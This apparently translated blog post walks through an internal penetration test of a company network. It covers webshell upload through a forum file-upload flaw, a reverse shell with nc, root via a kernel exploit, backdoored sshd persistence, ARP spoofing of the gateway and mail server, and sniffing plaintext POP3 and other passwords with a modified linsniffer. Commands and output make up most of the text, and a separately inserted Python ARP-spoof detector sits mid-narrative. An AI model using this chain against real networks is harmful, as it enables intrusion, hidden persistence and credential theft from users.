Linux ARP spoofing sniffing internal penetration test

Source: Internet
Author: User

I had already told the people responsible that the SMTP and POP protocols used for mailbox authentication should be encrypted; otherwise it is far too easy for someone on the company intranet to sniff the plaintext password. In addition, the mailbox password is shared with the BBS, and the BBS also uses plain HTTP rather than HTTPS, which is a problem. The network we control has been hardened: IP addresses are bound to MAC addresses, so even if someone spoofs an IP address, the spoofed host cannot reach the gateway (unless its traffic never needs to leave the gateway's segment), and therefore the plaintext mailbox password cannot be sniffed there (the mail server is not in the same network segment). However, some of our shared resources are servers with both a public IP address and an intranet IP address. These are at comparatively high risk and have no network environment with security policies matched to their security level, so some of the problems are obvious, yet some people do not see them at all. So I carried out a simple internal penetration test.

First, I start from a network segment that has both public and intranet IP addresses. For example, the public IP segment is 222.222.222.0/255.255.255.255.255 and the intranet IP segment is 192.168.0.0/255.255.255.0.

We found that an old version of a PHP forum was running on 222.222.222.77 (192.168.0.77). On probing, it had an upload vulnerability: the gif89a file-header spoofing trick was used to upload a webshell, and then an nst was uploaded.
Figure 1:



Use the back-connect function in the tools:
First, listen on a local port with nc -l -p 5546.
Figure 4:


Click Back connect in the nst.
Figure 2: (pay attention to the red part)



Login successful.
Figure 3:


Figure 5:


In the local nc window:
id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
The privileges are low. The vmsplice local privilege-escalation vulnerability in the Linux kernel from some time ago can be used. First upload the code with nst:
Figure 6: (pay attention to the red part; the upload succeeded)


Return to the nc window:
cp in.c /tmp

cd /tmp

ls
in.c
nst_c_bc_c.c
sess_af927ee319af5d5417b61ac520e53fcf
ssh-ZeOfP16753
tunl0

gcc -o in in.c

ls
in
in.c
nst_c_bc_c.c
sess_af927ee319af5d5417b61ac520e53fcf
ssh-ZeOfP16753
tunl0

/tmp/in
bash: no job control in this shell
[root@bbs111 tmp]# id
uid=0(root) gid=0(root) groups=99(nobody)
[root@bbs111 tmp]#

We now have root. Next I upload the backdoors I usually use, which I have modified. I have previously written about how to keep backdoors, so I will not describe it here (replacing sshd and some commands to hide ports, connections, files, processes, and so on).

Clean up and move on to the next step.

We still log in directly with the backdoored sshd. Or ssh :)
Figure 7:


Use the rz command in SecureCRT to upload our arpsnifer.c, then compile it:

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsnifer arpsnifer.c -lpcap -lnet

The error is probably because libnet is not installed. The description in arpsnifer.c confirms it: "Make: first you must install 'pcap' and 'libnet'", so both pcap and libnet have to be installed.

[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz
[root@bbs111 root]# cd libpcap-0.8.1
[root@bbs111 libpcap-0.8.1]# ./configure
[root@bbs111 libpcap-0.8.1]# make
[root@bbs111 libpcap-0.8.1]# make install

Preparation done. Recompile arpsnifer.c:

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsnifer arpsnifer.c -lpcap -lnet

No error is reported this time. The compilation is successful.

[root@bbs111 root]# ./arpsnifer
==========================================
============= Arp Sniffer ====================
=========== Write by Paris-Ye ============
=== Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
=== For example:
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

Now we start spoofing. Because we are on the server side, we spoof the gateway. (The network environment is as follows: mail server IP 192.168.0.11, gateway 192.168.0.1, local machine 192.168.0.77.)

[root@bbs111 root]# ./arpsnifer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
110
110
Get network cards mac address:
M-> 00:0e:a6:a5:80:4f
W-> 00:0f:e2:23:05:d0
S-> 00:d0:b7:88:07:59

Now Start ......
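From the defender's side, the spoof above shows up on the wire as ARP replies in which the mail server's IP 192.168.0.11 is suddenly claimed by the bbs host's MAC 00:0e:a6:a5:80:4f instead of the mail server's 00:d0:b7:88:07:59. The following added example (not part of the original article or the arpsnifer tool) parses raw Ethernet/ARP frames and flags exactly that IP-to-MAC conflict against a static binding table; the two frames it checks are constructed here from the addresses given on the page, not captured traffic.

```python
import struct

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode "reply"

def parse_arp_reply(frame):
    """Return (sender_mac, sender_ip) for an Ethernet/ARP reply frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen, op) != (1, 0x0800, 6, 4, ARP_REPLY):
        return None
    sender_mac = ":".join("%02x" % b for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return sender_mac, sender_ip

class ArpWatcher:
    """Keep the first (or statically configured) MAC per IP; flag replies that claim another."""
    def __init__(self, static_bindings=None):
        self.bindings = dict(static_bindings or {})  # ip -> mac
        self.alerts = []                             # (ip, expected_mac, claimed_mac)

    def observe(self, frame):
        parsed = parse_arp_reply(frame)
        if parsed is None:
            return None
        mac, ip = parsed
        expected = self.bindings.setdefault(ip, mac)  # first sighting becomes the binding
        if expected != mac:
            self.alerts.append((ip, expected, mac))
            return self.alerts[-1]
        return None

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Encode a raw ARP reply frame; used only to construct the sample input below."""
    smac, tmac = (bytes.fromhex(m.replace(":", "")) for m in (sender_mac, target_mac))
    sip, tip = (bytes(int(o) for o in a.split(".")) for a in (sender_ip, target_ip))
    hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    return tmac + smac + struct.pack("!H", ETH_P_ARP) + hdr + smac + sip + tmac + tip

GATEWAY = ("00:0f:e2:23:05:d0", "192.168.0.1")   # W in the article
MAIL = ("00:d0:b7:88:07:59", "192.168.0.11")     # S in the article
BBS = ("00:0e:a6:a5:80:4f", "192.168.0.77")      # M, the compromised host

def demo():
    """Constructed sample: a genuine reply from the mail server, then a spoofed one from the bbs host."""
    watcher = ArpWatcher({MAIL[1]: MAIL[0]})  # static IP/MAC binding, as the article's policy requires
    genuine = build_arp_reply(MAIL[0], MAIL[1], GATEWAY[0], GATEWAY[1])
    spoofed = build_arp_reply(BBS[0], MAIL[1], GATEWAY[0], GATEWAY[1])
    return watcher.observe(genuine), watcher.observe(spoofed)
```

In practice the frames would come from a capture socket on the gateway's segment, and the alert tuple is what should be logged or sent to the switch port-security/IP-MAC binding enforcement.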

Use tcpdump to watch for another login:

[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11

If data is seen, save the captured data to a file:

[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Stop after 10 minutes. Use the sz command in SecureCRT to download pop.txt to a local directory, then analyze it with Ethereal. The plaintext user name and password are found.

Next we can use linsniffer to capture the user names and passwords we want.
First modify linsniffer.c so that it captures the passwords of the applications needed. Mine is as follows:

if (ntohs(tcp->dest) == 21) p = 1;  /* ftp */
if (ntohs(tcp->dest) == 22) p = 1;  /* ssh, added for comparison only; comment out if desired */
if (ntohs(tcp->dest) == 23) p = 1;  /* telnet */
if (ntohs(tcp->dest) == 80) p = 1;  /* http */
if (ntohs(tcp->dest) == 110) p = 1; /* pop3 */
if (ntohs(tcp->dest) == 513) p = 1; /* rlogin */
if (ntohs(tcp->dest) == 106) p = 1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
                 from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

The warning can be ignored; run the compiled linsniffer directly.

[root@bbs111 root]# ./linsniffer

The user names and passwords are automatically stored in tcp.log.
Figure 8:


After the test, we sent one person's sniffed user name and password to that person. I believe he will no longer take it for granted that sniffing is impossible. Next we will use the sniffed passwords to build a password list for a new round of further intranet penetration testing. We believe our network security will be greatly improved once we carry out the security technical transformation and the standardization of security management based on the penetration test results.
